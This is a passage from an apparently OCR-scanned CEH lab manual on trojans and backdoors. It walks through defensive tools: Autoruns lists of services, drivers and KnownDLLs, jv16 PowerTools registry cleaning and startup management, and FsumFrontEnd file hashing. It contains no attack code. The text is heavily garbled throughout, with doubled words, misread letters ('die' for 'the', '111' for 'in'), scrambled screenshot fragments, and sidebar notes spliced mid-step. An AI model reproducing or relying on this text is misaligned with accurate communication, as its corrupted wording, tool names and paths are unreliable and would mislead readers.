TechSmith TechSmith Corporation Corporation c:\program files (x86 )\techs..
Alexander Roshal
c:\prog ramfil es\winrar\r are.
H KLM \S 0ftware\W0w6432N ode\Clas ses\x\S helE x\ContextM x\ContextM enuH andlers
0
SnagltMainSh .
0
*V
Snagit Snagit Shell Shell Extension Extension DLL
WinRAR32
TechSmith TechSmith Corporation Corporation
c:\program files (x86 )\techs..
WinRAR shel extension Alexande Alexanderr Roshal Roshal
c:\programfiles\winrar\rare. c:\programfiles\winrar\ra re.
H KLM \S oftware\Cla sses\D irectory\S helE xSContextM enuH andlers andlers
0
SnagltMainSh
Snagit Snagit Shell Shell Extension Extension DLL
TechSmith Corporation
Ready
c:\p rogr am files (x8S)\techs.
Windows Entries Entries Hidden.
FIGURE 8.10: Autonins Explorer list
12 12.. The Th e following are die Services list details. Autoruns [WIN-2N9STOSGIEN\Administrator] - Sysinternals: www.sysinter...L
O
File
Entry
Options
User
Help
*J & & B X * H
(33 Drivers This displays all kernel-mode drivers registered on the system except those that are disabled
Code Codecs cs
|
I Boot Boot Execute Execute
fc?; Win soc k Providers O
Ever Everyth ything ing | ^
|
&
Logon Logon |
Autorun Entry
]
3
Image hijacks hijacks
Print Monitors Monitors Explow T
|
[ jl Applnit Applnit
LSA Provide Providers i
Interne Internett Explor xplorer er
Description Description
£
|
KnownD KnownDLLs LLs
Network Provide Providers rs 1
Schedule Scheduled d Tasks Tasks |
Publisher
|
^
Wintogo Wintogon n
Sidebar Sidebar Gadoets Gadoets Service Services s
Drivers rivers
Image Path
HKLM\System\CurrentControlSet\Services HKLM\System\CurrentControlSet\Se rvices
g
T his service keeps keeps you Ad... Adobe Systems Systems Incorporated Incorporated c: \windows\syswow64\ma
0
[ 1 AdobeFlashPta AdobeFlashPta
0
[■1 c2wts
Service to convert convert claims claims b .. Microsoft Corporation
0
0
EPSO EPSON N USB USB Displa isplay y VI 40
EMPJJDSA EMPJJDSA
c:\program filesNwindo filesNwindows ws id ..
SEIKO EPSON EPSON CORPO RA.. c:\program files (x86)\epso...
0
F I M02illaMainten... illaMainten... The Mozi a Maintenance S. . Mozila Foundation Foundation
c:\program files (x86J\m02i ...
0
0o se
Saves Savesinsta instalati lationfi onfiles lesuse used d .. Microsoft Corporation
c:\program files (x86)\comm
0
F I osoosvc osoosvc
Office Software Software Protection... Protection... Microsoft Corporation
c:\program files\common fi
0
H
WSusCe WSusCertServe rtServerr This This service manage manages s the c... Microsoft Corporation
c:\program filesVupdate ser
Ready
Windows Entries Entries Hidden
FIGURE 8.11: Autoruns Services list
13 13.. The Th e following are die Drivers list details.
CEH L ab Manual Page 474 474
Ethica l Hac king and C ounte nneas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
O
Autoruns [WIN-2N9STOSGIEN\Administrator] Sysinternals: www.sysinter...L
File
Entry
3
Options
User
Imag Image e H^acks cks
|ExecuteBoot ! 3 |Codecs H
&
ft Winsock Providers Providers [
O
£9 Scheduled Tasks Task scheduler tasks configured to start at boot or logon
Everything Everything |
Help
Print Monroes Monroes |
$
Logon | . < Explorer Explorer | ^
Autorun Entry
Description Description
[
LSA Providers Providers*
|
£
Internet Explorer Explorer | J
Network Providers |
Scheduled Tasks |
Publisher
, $ Applnit
Sidebar Gadgets Services
Dnvers Dnvers
Image Path
HKLM\System\CurrentControlSet\Services ^
3ware
S) adp94xx( adpahci ^
| LSI 3ware SCSI Storpoct Driver}SI
c: \windows\system32\drrve.
Adaptec Windows SAS/SA... Ad aptec jnc .
c:\w indows \system32\dr1ve stem32\dr1ve..
Adaptec Windows SATA S t.. Adaptec, Inc.
c: \ windo ws\system32\drive.
Adaptec StorPort Ultr a320... Ad aptec jnc .
c: \ window$\system32\dnve window$\system32\dnve..
,amdsata 4
AH D 1.2 Device Driver
c: \ windo ws\system32\dnve.
amdsbs ^
AM D T echnology AH Cl Co... AM D T echnologies Inc.
adpu320
amdxata ^
Storage torage Filter Filter Driver
arcsas &
Advanced Micro Devices Adv ancedMi cro D evices
c: \ windo ws\system32\drive. ws\system32\drive. c: \ windo w$\system32\drive. w$\system32\drive.
Adaptec RAID Storpoc Storpoctt Driver PMC-Sierra, PMC-Sierra, Inc. Inc.
c: \ windowsSsy stem32\drrve. stem32\drrve.
Adaptec SAS RAID WS 03 ... PMC-SierraJnc. PMC-SierraJnc.
c:\window$\system32\drrve.
Ready
Windows Entries Entries Hidden.
FIGURE 8.12: Autoruns Drivers list.
14 14.. Tlie following fo llowing is die KnownDLLs list 111 Antonins. O
Autoruns [WIN-2N9STOSGIEN\Administrator] Sysinternals: www.sysinter...L
File
Entry
Options
User
Help
d j) & B X * I?• Winsock Provide Providers rs | O
Ever/hing E ve ve ry ry t hi hi n
Q
Code Codecs cs
^
^
Logon L og og on on | Q
Print Print Monitors Monitors | ^ Explore Explorer ]
Boot Boot Execute Execute |
Autorun Entry
Description Description
&
LSA Provide Providers rs | I nt nt er er ne net Ex pl pl or or er er ] J
f" ^ Image Image Hijacks Hijacks |
f
Network Network Provide Providers rs | 9• S ch ch ed ed ul ul ed ed Tas ks ks 1
[ j| Applnit Applnit
\ KnownDLLs
Publisher Publisher
Sidebar Sidebar Gadge Gadgets ts
S er er vi vi ce ces [
j
Dr iv iv er er s Winlogon
Image Path Path
ij T HKLM \System\CurrentControlS ystem\CurrentControlS et\Controf\S ession ession Manager\KnownDlls
0
13
_W0w6 4
File not not found: C:\Wndows...
0 1
W ow 64c pu
found: C:\Wndow s. File not found:
0 ■
Wow64win
File not found: C:\Wndow s...
Ready
Windows Entries Entries Hidden
FIGURE 8.13: Autoruas Known DLL’s list.
ool s 111 Windows Server 2012 15 15.. Install and launch jv1 6 Po we rT ools 2012 (host machine). T A S K
4
16. 16. jvl6 Power P ower Tool is located at D:\CEH-Tools\CEHv 8 Module 06 Trojans Jv16 Power Tool Tool
and Backdoors\Registry Monitoring Tools\jv16 Power Tools 2012.
17. To launch jv1 6 Po werT we rToo ools, ls, select die Start menu by hovering die mouse cursor on die lower-lef lower-leftt corner ot die desktop.
CEH L ab Manual Page 475 475
Etliical Ha ckin g and Cou ntenn easure s Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
|
, V KnownDLLs
|
A
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
u
Unilb Rnta
€ (tarn aP Phut T..
3 Windows Serve Serverr 2012 2012 Wirdowt Server 2012 Rocate Cancxfatr Caucrnt . fcvaluator copy. Eud *40.
.. . * J L J L .
1 FIGURE 7.1 7.1:: Windows Server 2012 2012 Start-Desktop
18. Click jv 16 P ow er T oo ls 2 0 1 2 111 Start menu apps. Administrator A
Start
03 Winlogon Noti fica tion s Shows Shows DLLs DLLs that register for Winlogon notification of logon events
FIGURE 7.2: Windows Server 2012 Start Menu Apps
19. 19. Click the Clean and fix my computer icon.
C] Winsock Providers Shows Shows registered Winsock protocols, including including Winsock service providers. Malware Malware often installs itself it self as a Winsock service provider because because there are are few tools diat can remove them. Autoruns can uninstall them, but cannot disable them
CEH L ab Manual Page 476 476
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
P 1 E*e
Language Language
jvl 6 Powe PowerT rToo ools ls 2012 2012
O
K
lo ok
Help
r
Trad LrnMDon n Effect - 60 days left
Live Support: Onlne
Handbook Handbook not avadaWe
Home
Registry Tools
^ File Tools i
Fully remove software and leftovers
Speed up my computer
Immunize my computer
Verif y my downloads are safe to an
System Tools
Privacy Tools
—
Backups
Control which programs start automabcaly
Acton Hstory
L U JSettings Trial Reminder
■
92<*>
Registry Health 9SV0
PCHealth jv l6 PowerT PowerTools ools (2.1.0.1173) runnng runnng on Datacenter Datacenter Edition Edition (x64) (x64) with 7.9 GB of RAM RAM [10:29:45 T ip] : Your system has has now been analyzed. analyzed. The health score of your computer ts 95 out of 100 and and the health score of yo ir Wndows re gstr y 6 92 out o f 100. I f you scored under under 100 you can improve improve!! the ratings by usrtg the Oean and Fa My Computer tool.
FIGURE 8.2 8.20: 0: jvl6 jvl 6 Home page. page.
20. Tlie Clean and fix my computer dialog box appears. Click the Settings tab and then click click die Start button. butt on. jv l 6 PowerTo ols 2012 [W8-x6 4] - Clean and fix my co mp ute r
□
Settings
Additional safety
#
Additional options
*
L i 10
Search words
Ignore words words
Settings
A
Emphasi Emphasize ze safety over both scan speed speed and the number of found errors.
Emphasi Emphasize ze the number o f found errors and speed over s afety and accuracy. accuracy.
Selected setting :
H
CEH L ab Manual Page 477 477
Normal system scan scan policy: all Window s-related data is skipped for additional safety. Only old temp files are listed. listed.
Cancel
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
(3S LSA Providers Provi ders Shows Shows registers Local Security Authority (LSA) authentication, notification and security packages
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
FIGURE 8.21: jvl6 Clean and fix my computer dialogue.
21. It will analyze analyze you yourr system for tiles; tiles; this will will take a few minutes. 1-1 jv16 PowerTools 2012 2012 [W8-x64] File
Select
Tools
-
I Px
Clean and fix my computer!
Help
[ Analyzing your computer. This can take a few mmutes. mmutes. Please wait...
Abort
Printer Monitor Drivers Displays DLLs that load into the print spooling service. Malware has used this support to autostart itself
FIGURE 8.22: jvl6 Clean and fix my computer Analyzing.
22. Comp Co mpute uterr items items will be listed after die complete com plete analysis analysis.. iv16 PowerTools 2012 rW8-x641
LJ You can save die results of a scan with File->Save and load a saved scan widi File->Load. These These commands work with native Autoruns file formats, but you can use File->Export to save a text-only version of the scan results. You can also automate the generation of native Autoruns export files with command line options
File
Select
Tools
-
!
Clean and fix mv comDuter!
r
x
Help
Item Severity Description Tags Item
/
Seventy
Descrpbon
Tags
.....................
! 3 R e g i s t r y E rro rs
7
! I ^
7
I n v a l i d f i le le o r d i r e c to to r y r e fe fe r e n c e
I ] c ) R e g is try ju n k
266
J O b s o l e t e s o f t w a re e n t ry Usele ss empty key
146
♦ J U s e le s s fi le e x te n s io n
116
|~1 |~1
^
4
+J Start menu and desktop items
I
23
-
II
Delete
dose
Selected: Selected: 0, highlighted : 0, total: 296
FIGURE 8.24: jvl6 Clean and fix my computer Items details.
23. Selected item details details are as follows.
LJ Sidebar Displays Displays Windows sidebar gadgets
CEH L ab Manual Page 478 478
Ethica l Hac king and C ounte nneas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
jv16 PowerTools 2012 2012 [W8-x64] - Clean and and fix my com puter File
Select
Tools
Help
Item Seventy Description Tags It em
/
Seventy
Descryton
Tags A
13 Registry Errors
7
13
7
I n v a l i d t i l e o r d i re c t o r y r e f e r e n c e HKCRUnstal l
:3 %
1HKCRUnstal ^
HKLM HKLM\so \softw ftw< <
13%
Fie or directory directory X :
=
FJe or directory X :
_ ] H KL M \s ot tw ;^ B □
HKLM HKLM\SO \SOFT FT\/ \/
13%
File or directory X :
□
HKLM HKLM\S \SOF OFT\ T\ll
13%
Fie or directory directory X :
_ | HKLM\S0ttwi
H Compare Compare the current Autoruns display with previous previous results results that you'v you'vee saved. Select File | Compare and browse to die saved file. Autoruns will display display in green any new items, which correspond to entries that are not present in the saved file. file. Note that i t does not show deleted items
FJe or directory X : Fie or directory 'C:
FJe or directo ry X : 26 6
13 Registry junk
V
Selected: Selected: 0, highlighte d: 0, total: 296
FIGURE 8.23: jvl6 Clean and fix my compute! Items.
24. The Registry junk section provides details for selected items. 1- jv16 PowerTools 2012 2012 [W8 x64]~ Clean and fix my computer! File
[ J If you are running running Autoruns without administrative privileges privileges on Windows Vista and attempt to change die state of a global entry, you'll be denied access. Autoruns will display a dialog with a button that enables you to re-launch Autoruns with administrative rights
Select
Tools
*
Help
Item Severity Description Tags Item _] 3 3
/
Severity
Description
Tags
Re gi str y ju nk
26 6
O b s o le te s o ft w a re e n try
4
□
HKCUVSoftw
30%
Obsolete software e
□
H KC KC U^ U^o ftftw
3 0%
Obsolete so so ft w a re {
□
HKUS\S-1-S-
30%
Obsolete so ft w a re
□
H KU KU SV SV 11-5 -
30%
Obsolete software e
□
( 3 U s e l e s s e m p ty k e y
□
HKCRVaaot |
10%
Useless e mpty key
1 46
□
H KC KC RV RV aa aa ot ot
2 0%
Useless e mpty key
□
HKCRVacrot
2 0%
Useless e mpty key
MK MKCRV.aaot
2 0%
Useless em otv kev
Selected: Selected: 0, highlighted : 0, total: 296
FIGURE 8.25: jvl6 Clean and fix my computer Item registry junk.
25. Select all all check boxes 111 die item list and click click Delete. A dialog box appears. appears. Click Yes.
L&S f c s l i l f i f l Page Emp ty Loca tions select selection ion in die Options menu is checked Autoruns doesn't show locations with no
—
479
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
jv16 PowerTools 2012 2012 [W8-x64] - Clean and and fix my co mpu ter[ File Select Tools Help Item Seventy Description Tags Item
Seventy
0 J
Tags
jv16 PowerTools 2012
O
0
Descnption
You are about to delete a lot of erroneous registry data. Using the Fix option is always w ays the better option. Are you sure sure you kn ow wh at you are doing and w ant to proceed? proceed?
*I S l a i l m e n u a nd nd d e s k t o p i te te m s
23/23
Selectedj29^highlightedfttotah296
FIGURE 8.26: jvl6 Clean and fix my compute! Item check box.
Control which programs start 26. 26. G o to the Home tab, and click die Control automatically icon.
CEH L ab Manual Page 480 480
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
UJ The Verify Signatures option appears in the Opti ons menu on systems systems that support image signing verification and can result in Autoruns querying certificate revocation list (CRL) web sites to determine i f image image signatures are valid
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
FIGURE 8.28: jvl6 Control which program start automatically.
27. 27. Check programs in Startup manager, and th then en you can select select die appropriate appropria te action. action. T Z S
jv16 PowerTools 2012 [W8-x64] - Startup Manager File
Select
Tools
Help Process running Yes
Enabled
C! The Hide Microsoft Ent ries selection selection omits omits images that have been signed by Microsoft if if Verify Signatures is selected and omits images that have Microsoft in their resource's company name field if Verify Verify Signa tures is not selected selected
System System e ntry No
PID
4280
Program
)usched.exe
Threads
4
Filename
C: program Files (x86)VCommon (x86)VCommon 1
Command Ine 'C:\program FJes (x86)\Common
Ba ass e p riri or or itit y
N or or ma ma l
Memory usage
9.12 MB
Loaded from
rt
Page Page file usage usage 2.23 MB MB
Descrption
JavaCTM) JavaCTM) Update SchecUer
File size
246.9 2 KB
Tags Enabled
/
Descrption
Program
Tags 10 —
|l 1F ound software i
I S
■
Yes
)usched.exe
□
Yes
googletalk.exe
Go og og le Ta Ta lk lk
C:program Files
□
Yes
EMP_UO.exe
EPSON USB Dispk C:\Program Files
□
Yes
Reader_s Reader_sl.ex l.exe e
Adobe Adobe Acrobat S| S| C:\progr C:\program am Files Files
□
Yes
AdobeARM .exe Adobe Reader ar 1C: 1C: program Files
□
Yes
1g f x tr tr a y. y. e xe xe
□
Yes
hkcmd.exe
hkcmd Module
□
Yes
1gfxpers. gfxpers.exe exe
pers persis isten tence ce Mod Modi. i. C:\W C:\Wind indows owsfey feyst st
C: p ro ro gr gr am am F ilil es es =
i gf gf x Tr Tr ay ay M od od ul ul e C ::\\ W Wii nd nd ow ow st st e eyy st st C :\ W in d o w s ^y s t
FIGURE 8.29: jvl6 Startup Manager Dialogue.
28. Click die Registry Tools menu men u to view registry registry icons. icons.
f!
File
jv16 PowerTools PowerTools 2012 2012 Language
Tools
Help
I MACECRAFT MACECRAFT >SOFTWARE
B3 Use the Hide Microsoft Entries or Hide Windows Entries in the Options menu to help you identify software that's been added to a system since installation. Autoruns prefixes the name of an image's publisher with "(Not verified)" if it cannot verify a digital signature for the file that's trusted by the system
Trial Urnta bon bon n Effect - 60 days lef t
$ Registry Tools
System Tools
^
Priv Privac acyy Tool Tools
m Regs try Manager
j8 j8> Regetry Compactor
49
Live Support: Online
L
Handbook Handbook not avaiaWe
m
Registry F^der
Registry Find & Replace
Registry Information
Registry Monitor
Registry Cleaner
Backups
Acton Hstory
IU I
Settin Settings gs
100%
Registry Health
Trial Reminder You are using the free trial version o f jvl 6 PowerTools. Pick here to buy the real version'
FIGURE 8.30: jvl6 Registry tools.
29. Click File Tools to view hie icons. CEH Lab Manual Page 48 481
Ethica l Hac king and C ounte nneas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
EE1 The H ide Windows Entries omits images signed by Windows Windows if Verify Signat ures is selected. selected. If Verify Signatures is not selected, Hide Windows Ent ries omits image imagess that have Microsoft in their resource's company name field and the image resides beneath the %System %SystemRoot% Root% directory
FIGURE 8.31: jvl6 File tools.
30. Click System Tools ro view system icons. x
jv16 Powe PowerT rToo ools ls 201 2012 2 Fite
Language
Tools
Help
I MACECRAFT ' SOFTWA RE
Home
Registry Tools
! Im■!
^
Trial Untatoon In Effect - 60 days left
U EH
Software Unnsta ler
Startup Manager Manager
Service Manager
System Optimizer
Live Support: Online
L
Handbook Handbook not avaiaWe
Qj Start Menu Tool
Automation Automation Tool
System Tools
Priv Privac acyy Tool Tools
Backups
Action History IQ I
Setti Setting ngss
100% Registry Health
& T o o ls demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans § a < & d 9 f l » Page 482
Trial Reminder You are using the free trial version version of jvl 6 PowerTools PowerTools.. ClioClioreal version!
to buy the
FIGURE 8.32: jvl6 System tools.
Ethica l Hac king and C ounte nneas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
31. Click Privacy Privacy tools to view privacy icon. jv16 Powe PowerTo rTools ols 201 2012 2 I E*e
!,*"Q uage
1001* 1001*
Hdp
1MACECRAFT ' SOFTWARE
A
Regi Regist stry ry Tools
1^
Fie Tools
B
Syste ystem m Tools
Trial Lfnitabon in Effect - 60 days left
his tory Oeaner
L
Live Support: Online
Handbook not avarfable
Disk Wiper
Backups Actjon Hstory Settings
|Llj
3
Trial Reminder Reminder You are usng the free trial version of jv 16 PowerTools. Ckk here to buy the real version
FIGURE 8.33: jvl6 Privacy tools.
32. Click Backups in die menu to display die Backup Tool dialog box. xT T ^ T eT
jv16 PowerTools PowerTools 2012 2012
£Q You can compare the current Autoruns display with previous results that you've saved. Select File|Compare and browse to the saved file. Autoruns will display in green any new items, which correspond to entries that are not present in the saved file. Note that it does not show deleted deleted items
File
Language
loots
Help
MACECRAFT
O £He
SOFTWARE
Trial Umitabon Umitabon in Effect - 60 days lef t
Live Support:
jv16 PowerTools PowerTools 2012 2012 [W8 x64] Backup Tool I ~ I Select Select
Registry Backups Descnptjon
lo ok
L
Handbook not
x
1
Help
Fie Backups
Type
Othef Backups Size
ID
Created
0 13 File File Backups Backups □
Clean e an and and Data Data remo remove ved d 34.6 34.6 KB
0006 00062D 2D
21.09 21.09.20 .2012 12,,
Re Sejected^^iighliqhted^^otaM
■
FIGURE 8.3 8.34: 4: jvl6 Backup took
CEH L ab Manual Page 483 483
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
33. Go to Windows Server 2012 Virtual Machine. =
TASK
5
FsumFrontEnd
34. Double-click FsumFrontEnd.exe, the executable tile located at D:\CEHTools\CEHv8 Module 06 Trojans and Backdoors\Files and Folder Integrity Checker\Fsum Frontend.
35. The Fsum Frontend main window is shown 111 the following following screenshot iz r^ *
Fsum Fronte nd v l .5.5. .5.5.1 1
ESS
B -Q Fsu m Fro nten nten d Tools □ ₪ B -Q C Cal alcu cu late late hash hash e
n Meth o d s (96 (96 ) ad lcrS lcrS
5E = : : Tod 23 - :
■
Verify Verify checksu r 3& : *Generate chec Options 0 5 ! • About
Q adler32
Q ad lcr1 lcr1 5
cfcsum_mp€c2 cfcsum_mp€c2 Q crc8
■
□
c r cl cl 6_ 6_ xr xr >dem >dem □
i
c1 c3 c3 2 __mp mp cg cg 2
n d F32 F32
f l crc16
crcl6 crcl6_zm _zmod odem em □
1 icrc.5 icrc.544
crcM crcM O crc64 crc64 _ ecma ecma
(_ (_)) fletch fletch er8
Q fletch fletch erl 6
ap hash
C b ddkk r
n crc1 crc1 6 _ ccit ccittt
HI crc16_ibm
□
□ c rc rc JZ JZ
IZ crc32_br1p2 crc32_br1p2
d crc32ja crc32jamcrc mcrc
( j d jb h ash as h Q. fletcher32
d d hho o Z35 Z35
CfnvO-22
(7 edonkcy
L
f
n
1
/
Compare
Hath:
lSa.Ua
Encoding:
Bate 16 16 (hexadecimal)
C C?Lo ?Lo g
2 ,
Websits htipi.'/fsumfesourcefoi
& CEH-To CEH-Tools ols are also located mapped Network Drive (Z:) of Virtual Machines
FIGURE 8.35: FsumFrontEnd main window.
36. Select the type ot o t hash th at you want; let’ let’ss say md5. Check C heck die md5 check box. Fsum Front end v1 .5.5. .5.5.1 1 _ Fsum Fron tend ■j □
T oo oo l* l*
I H-I Calculatehaiht latehaiht &>*
Tort
10 Verify Verify checksur ! G en en er era !• !• c h* h* c e ; 8 8 O p titi o ns ns
_____ . . . % m. . _ _____
.........
(_J haval224 (3)
u b*val224 b*val224 (4)
u haval224 (5)
Lh o v al2 5 6 (3 )
□ / w ch ch
Q j i hJ hJ K h
□ m dl
Cl «nd4
(✓md*.|
□ p a na na n ui ui
D p j w r3 2
n ri p « m d l2 8
T 1 rlpemd rlpemd lf lfttO O
□
C ri p e m d 3 2 0
C
0 s db db m
f l sh aO aO
D >h« >h« 1
□ »ha2 (224)
C > h a 2 ((22 5566 )
C 3 h « 2 ((33 8844 )
1 1 * 1 2 ((55 1 2 )
n s i:i: c6 c6 4
f 1sncfru2128(41 1sncfru2128(41
T 1snefm2 1snefm2 128 128 (8 (811
r
r i p e m d2 d2 5 0
hava 1256(4) 1256(4)
l_ h » v jl2 5 6 (5 )
sn efru efru 2 2 5 6 W r
hash
=
sn efru efru 2 22S6 S6 f8> f8>
v
4 -- | A b ou ou t Mash:
\m
Fi e
^ Co
^ 0 a | Uk Q
Encoding: | Base 16 (hexadecimal) v
□ hwac
[
Web titt h ttp :.'/fsu :.'/fsu r>» r>» eto j <«ror 3 en e! I
CEH L ab Manual Page 484 484
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
0-64
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
FIGURE 8.36: FsumFrontEnd checking md5.
37. Select a tile tile by clicking die File browse brow se b ottom ot tom from die desktop. That Th at is Test.txt. Fsum Frontcnd v1.5.5.1 Fsum Frortend Q T oo oo ls ls L2 Calculate- 0
j-c5 He
□ M e t ho ho d s ( 1 / 9 6 ) »1 1
:
Q Have Autoruns Autoruns automatically execute an Internet search in your browser by selecting Search Online in the Entry menu
S 3 Verify Verify chccksur ■•: Geaerare check gH Options
□ h av al2 al2 24 24 (J (J))
□ h ava!2 ava!222 4 (4 (4))
□ haval224 aval224 (S) (S)
Ch av al2 5 6 (3 )
|
□ / ha ha sh sh
□ j sh sh a sh sh
□ m d? d?
G m d4 d4
B m d5 d5
□
□
risdbm
□ ripcmd ripcmd 1 28 28
G ripemd ripemd l&O
E" 1ipemd256
E " r ip ip c m d3 d3 2 0
I
i s h a sh sh
(~1 shaO
Qshal
□ sh a2 (2 (222 44))
Q sha sha2 2 (256) (256)
□
sha2(3 sha2(3&4) &4)
n« ka 2 C CS S11 22II
(- I (17664
IH snefru2 128(4) I 1snefru2 1snefru2 128 (8) I
p j"j" 3 2
hava!2S6 (4)
Q] hav3 2S0 (5)
snefru2 256 14) I
p M wr wr ?
snefru2 256 (1
J?| About :■ Hash: Fie
|
=3 B ,
Encoding: |Base 16 [hexadecimal)
vj
O HMAC HMAC
Wlog
Website httpr.'/fiumfesoircerorge-ne:
FIGURE 8.37: FsumFrontEnd file browse.
& Autor Autoruns uns displays the text "(Not verified)" next to the company name of an image that either either doe s not have a signature or has a signature that is not signed by a certificate root authority on the list of root authorities trusted by the system
B--EZ Fsum Ficntcnd a - S T oo ool s : b -ZH C Cal alcu cu late late h ash ash es ;-•G3 Fie :-23 Tec jQ V» rify chK h 1 AJ Genera te ch«< ch«<
□ Methods :96( idler? D(bu1r.mpcg2
Hladlerl6
□ adler32 adler32
n ap has hashh
[H«c8
□ c rc rc 16 16
□ ac1 6 _cci _ccitt tt
| | bdlcr bdlcr crc15_ibm
□ ac15 ac15 _ xx22 5
0 © '•
:1
Orgenirc ’ ■
Nev» folder
Desk Desk to to p
J| Downleads Recent places Ito arits 3 Do cumen cumen ts ts
A-
Computer Folder
SK
Network System Folder
Muu d r J 1 M Pictures 3
fe
Vid Vid eo eo s
flP Computer Local D«fc (C.)
< r
Google Chiomc Shortcut 2.il KB Test Text Document
— 1—a Lccel Disk D) a
Mot i II j j Firefox Shortcut 1.06 KB
Local Local Disk s k [& [&)
0 byte* Filename: Test
| a !I !IFiles Files r. T
3
Website. http:Vfsumfc.50u ccfcrgc. *ct
FIGURE 8.3 8.38: 8: Fsum Front End E nd fileopen.
38. Click Add Folder to select a folder to be added to die hash, for example, D:\CEH-Tools
CEH L ab Manual Page 485 485
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
Fsum front end v1.5.5.1
—I
x
B--IS Fsum Frontend i) □
T oo oo ls ls|
i 1- 1 ■I
C a lc lc u la la t e h as as ht ht J “ !•••^Tort 3
Methods a / 95: (J haval224 haval224 (J)
[ J h«val224 h«val224 (4)
Uhav al224(5 )
U haval258 haval258 (3)
L havat25&( havat25&(4) 4)
H
Q J h JKh JKh
□
L
E
n ri p« m dl 28
Mr lpe m dlf tO
P ripem d256
□ ripe md3 20
C is h a sh
□»haO
□>hd1
□ » hhaa 2 ( 22 22 44))
Csha2(2S 6)
(I 384) 2«« )
K
Verif Verify y check check su r pj* 32 jk Gener ate chec k ! □ » d bm bm 8ij Options 1 s k a2 a2 (5 (5 1 2) 2) About Cowpare
si:c€4 si:c€4
md S
1 1sncfru2123 (4) I
snefw2 128 (8 (811
*^
Ch«v al258 (5) L p a ru ru rrrr a
efru 2 2 5 8 (41 T sn ef 1 u 2 2 5588 ff88> V sn efru
v
Hash: Fie ^
G fl Autoiuns prefixes the
l)ACEH-T0cls\CEHv3 Module 06 Trojans and BackdoorsN BackdoorsNFiles Files and Folder Integrity Che dteiV sum fronte nd1.5 | _ . |_ 0 1
E n c o d i n g : |G a s e 16 ( h c x a d c d m a l )
v|
Qj HMAC
File
name of an image's publisher publisher with "(Not "(Not verified)" if it cannot verify a digital signature for die file that's trusted by the system
< 1t e L o J V
=
Webcit• http:7f1umfetoarcaforge.net 1
FIGURE 8.39: FsumFrontEnd Add Folder. Fsum Frontend v1.5.5.1 Fsum ficntend H-b2 Tools I B-t3 Cakuiateh Cakuiatehash ashes es
j I id «t j I
23Tea
"| kMhwfe (1/96 ! | ghj!h3 L 9^- ^ _JhMl1 60(3) Q_hBv9il60(j} □ hav?C24 hav?C24(4)
: Hi Verify Verify checksum checksum (4es (4es Qmd 2 •- £ Gen&ilt checksum fi □ rip«fnd256 fnd256 :••05 Options
Q tav*224 (5 (5))
Cmu
C! fipemdSZQ
Hash File
LI 9** □ havall 60 (5) □ hav8B56 hav8B56G) G) 5jmd5 □ rshash rshash
LlhailfiO □ panama panama [I!sdbm
| |Koval128(4)
I_h«v«n2ac5)
□ h«v«l192 (A)
□ havaH92[S havaH92[S))
Ch«r11224{3J
□ hav8l256 hav8l256 (5) (5)
Qjhash
Cjsh* h
□ ripemd ripemd128 128 [ ! d ia ia l
C ripemd160
U havelVA(3)
□ hava!192(3 hava!192(3)
Dhaval256(4)
□ pjw32 □ shaO H
Browse For Folder
Dt\CB4-T00IACE
_ _
5
Cshi2224)
CheckerSfsumfrontend- 1.5.5.1' cadrnt•jC
1-i “• “*
t• A Administrator A
Computer
t fa Local Disk(CO
«lD lDisk< k
iL £3 A "Hide Signed Microsoft Entries" option helps you to zoom in on third-party auto-starting images that have been added to your system
— iL . __ — ___ —
I
|
CW«I 1
FIGURE 8.4 8.40: 0: FsumFrontEnd FsumFront End Adding Folder. Folder.
39. Respective tiles of o f die selected folder fo lder will will be listed 111 a list box.
CEH L ab Manual Page 486 486
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
II
Fsum Fromend vl .5.55.1 .1
14■_2 Ftum fk■>t«nd a U ooi1 : m tJ CakulatohMhtt CakulatohMhtt i : T «! (9J V»1f, che cksum 14c. : G«n«r «' .t c ^ * J au au m f i cJJ Options About
- ! u H
|
□ Maihodb Maihodb <1/ 96( □ h*aH600> h*aH600> □ Krv»LL4 Krv»LL4(4) f~~ltm&? f~~l tm&?
[ »wvaM vaM60 60(4 (4}} ( **•vrfiMlS) ( kmM
[ |haval1G |haval1G0(3) 0(3) |hav.l2S6<3) v ja i d )
